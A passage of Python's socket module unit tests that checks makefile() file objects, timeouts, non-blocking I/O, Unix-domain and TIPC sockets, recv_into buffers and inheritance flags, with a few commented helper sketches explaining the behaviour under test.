self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
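# A minimal standalone sketch (not part of the test suite) of the mechanism
# described in NonBlockingTCPTests.assert_sock_timeout() above: setting a
# timeout on a Python socket switches its file descriptor to non-blocking
# mode, while the socket still reports itself as blocking at the Python
# level.  Requires the fcntl module, so POSIX only.
def _timeout_sets_nonblocking_fd_sketch():
    import socket, fcntl, os
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(2.0)            # "blocking with a timeout" at the Python level
        flags = fcntl.fcntl(s.fileno(), fcntl.F_GETFL)
        fd_nonblocking = bool(flags & os.O_NONBLOCK)
        return s.getblocking(), fd_nonblocking   # expected: (True, True)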
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
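    (A standalone sketch of this read/write pairing, outside the test
    classes, appears right after this class.)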
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
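# A minimal standalone sketch (not part of the test suite) of the makefile()
# pairing described in the FileObjectClassTestCase docstring above: one end
# of a socketpair() is wrapped for writing and the other for reading, and
# whatever is written and flushed on one side can be read back as a file on
# the other.
def _makefile_roundtrip_sketch(payload=b"hello, makefile\n"):
    import socket
    a, b = socket.socketpair()
    with a, b:
        with a.makefile('wb') as write_file, b.makefile('rb') as read_file:
            write_file.write(payload)
            write_file.flush()
            return read_file.read(len(payload))   # == payload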
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = socket_helper.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = socket_helper.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
        # create_connection() enumerates through all the addresses returned
        # and if it doesn't successfully connect to any of them, it propagates
        # the last exception it encountered.  (A simplified sketch of this
        # enumeration appears after this class.)
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = socket_helper.get_socket_conn_refused_errs()
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
try:
socket.create_connection((HOST, 1234))
except socket.timeout:
pass
except OSError as exc:
if socket_helper.IPV6_ENABLED or exc.errno != errno.EAFNOSUPPORT:
raise
else:
self.fail('socket.timeout not raised')
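# A minimal standalone sketch (not part of the test suite) of the enumeration
# behaviour described in NetworkConnectionNoServer.test_create_connection()
# above: socket.create_connection() tries every address that getaddrinfo()
# returns and, if no attempt succeeds, re-raises the last error it saw.  This
# simplified version ignores the timeout and source_address handling of the
# real helper.
def _create_connection_sketch(host, port):
    import socket
    last_err = None
    for family, type_, proto, _canonname, addr in socket.getaddrinfo(
            host, port, 0, socket.SOCK_STREAM):
        sock = None
        try:
            sock = socket.socket(family, type_, proto)
            sock.connect(addr)
            return sock              # first address that connects wins
        except OSError as err:
            last_err = err
            if sock is not None:
                sock.close()
    if last_err is not None:
        raise last_err
    raise OSError("getaddrinfo returned an empty list")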
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = socket_helper.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port),
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port),
timeout=support.LOOPBACK_TIMEOUT,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class UDPLITETimeoutTest(SocketUDPLITETest):
def testUDPLITETimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDPLITE)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDPLITE)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDPLITE)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
socket_helper.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules")
except (FileNotFoundError, IsADirectoryError, PermissionError):
        # It's ok if the file does not exist, is a directory, or if we
        # don't have permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
                # timeout == 0 means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
